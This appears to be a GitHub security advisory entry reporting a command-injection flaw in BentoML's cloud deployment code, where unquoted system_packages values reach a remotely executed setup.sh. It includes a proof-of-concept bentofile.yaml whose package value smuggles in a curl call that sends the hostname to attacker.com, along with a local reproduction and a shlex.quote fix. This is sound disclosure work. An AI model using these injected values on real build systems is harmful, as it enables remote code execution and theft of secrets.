+ "details": "Commit ce53491 (March 24) fixed command injection via `system_packages` in Dockerfile templates and `images.py` by adding `shlex.quote`. However, the cloud deployment path in `src/bentoml/_internal/cloud/deployment.py` was not included in the fix. Line 1648 interpolates `system_packages` directly into a shell command using an f-string without any quoting.\n\nThe generated script is uploaded to BentoCloud as `setup.sh` and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier.\n\n## Details\n\n**Fixed paths (commit ce53491):**\n- `src/_bentoml_sdk/images.py:88` - added `shlex.quote(package)`\n- `src/bentoml/_internal/bento/build_config.py:505` - added `bash_quote` Jinja2 filter\n- Jinja2 templates: `base_debian.j2`, `base_alpine.j2`, etc.\n\n**Unfixed path:**\n\n`src/bentoml/_internal/cloud/deployment.py`, line 1648:\n\n def _build_setup_script(bento_dir: str, image: Image | None) -> bytes:\n content = b\"\"\n config = BentoBuildConfig.from_bento_dir(bento_dir)\n if config.docker.system_packages:\n content += f\"apt-get update && apt-get install -y {' '.join(config.docker.system_packages)} || exit 1\\n\".encode()\n\n`system_packages` values from `bentofile.yaml` are joined with spaces and interpolated directly into the `apt-get install` command. No `shlex.quote`.\n\n**Remote execution confirmed:**\n- Line 905: `setup_script = _build_setup_script(bento_dir, svc.image)` in `_init_deployment_files`\n- Line 908: `upload_files.append((\"setup.sh\", setup_script))` uploads to BentoCloud\n- Line 914: `self.upload_files(upload_files, ...)` sends to the remote deployment\n- The script runs on the cloud build infrastructure during container setup\n\n**Second caller at line 1068:** `_build_setup_script` is also called during `Deployment.watch()` for dev mode hot-reload deployments.\n\n## Proof of Concept\n\nbentofile.yaml:\n\n service: \"service:svc\"\n docker:\n system_packages:\n - \"curl\"\n - \"jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}#\"\n\nGenerated setup.sh:\n\n apt-get update && apt-get install -y curl jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}# || exit 1\n\nThe semicolon terminates the `apt-get` command. `${IFS}` is used for spaces (works in bash, avoids YAML parsing issues). The `#` comments out the trailing `|| exit 1`. The injected `curl` exfiltrates the hostname of the build infrastructure to the attacker.\n\n## Impact\n\nA malicious `bentofile.yaml` achieves remote code execution on BentoCloud's build infrastructure (or enterprise Yatai/Kubernetes build nodes) during deployment. Attack scenarios:\n\n1. **Supply chain:** A shared Bento from a public model hub contains a poisoned `bentofile.yaml`. When deployed to BentoCloud, the injected command runs on the build infrastructure.\n2. **Insider threat:** A data scientist with deploy permissions injects commands into `system_packages` to exfiltrate secrets from the build environment (cloud credentials, API keys, other tenants' data).\n3. **CI/CD compromise:** The build infrastructure typically has access to container registries, artifact storage, and deployment APIs, making this a pivot point for broader infrastructure compromise.\n\n## Local Reproduction Steps\n\nTested and confirmed on Ubuntu with BentoML source at commit 0772581.\n\nStep 1: Create a directory with a malicious bentofile.yaml:\n\n mkdir /tmp/bento-pwn\n cat > /tmp/bento-pwn/bentofile.yaml << 'EOF'\n service: \"service:svc\"\n docker:\n system_packages:\n - \"curl\"\n - \"jq; touch /tmp/PWNED_BY_INJECTION #\"\n EOF\n\nStep 2: Generate the setup script using the vulnerable code path (extracted from deployment.py:1648):\n\n python3 -c \"\n import yaml\n with open('/tmp/bento-pwn/bentofile.yaml') as f:\n config = yaml.safe_load(f)\n pkgs = config['docker']['system_packages']\n script = f\\\"apt-get update && apt-get install -y {' '.join(pkgs)} || exit 1\\n\\\"\n print('Generated setup.sh:')\n print(script)\n with open('/tmp/bento-pwn/setup.sh', 'w') as f:\n f.write(script)\n \"\n\nStep 3: Execute and verify:\n\n rm -f /tmp/PWNED_BY_INJECTION\n bash /tmp/bento-pwn/setup.sh\n ls -la /tmp/PWNED_BY_INJECTION\n\nResult: `/tmp/PWNED_BY_INJECTION` is created, confirming the injected `touch` command executed. The semicolon broke out of `apt-get install`, the injected command ran, and `#` commented out the error handler.\n\nGenerated setup.sh content:\n\n apt-get update && apt-get install -y curl jq; touch /tmp/PWNED_BY_INJECTION # || exit 1\n\nFor comparison, the fixed version (with shlex.quote) would generate:\n\n apt-get update && apt-get install -y curl 'jq; touch /tmp/PWNED_BY_INJECTION #' || exit 1\n\nThe single quotes from shlex.quote neutralize the semicolon and hash, treating the entire string as a literal package name argument to apt-get.\n\n## Suggested Fix\n\nApply `shlex.quote` to each package name, matching the fix in `images.py`:\n\n if config.docker.system_packages:\n quoted = ' '.join(shlex.quote(p) for p in config.docker.system_packages)\n content += f\"apt-get update && apt-get install -y {quoted} || exit 1\\n\".encode()\n\n— Koda Reef",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments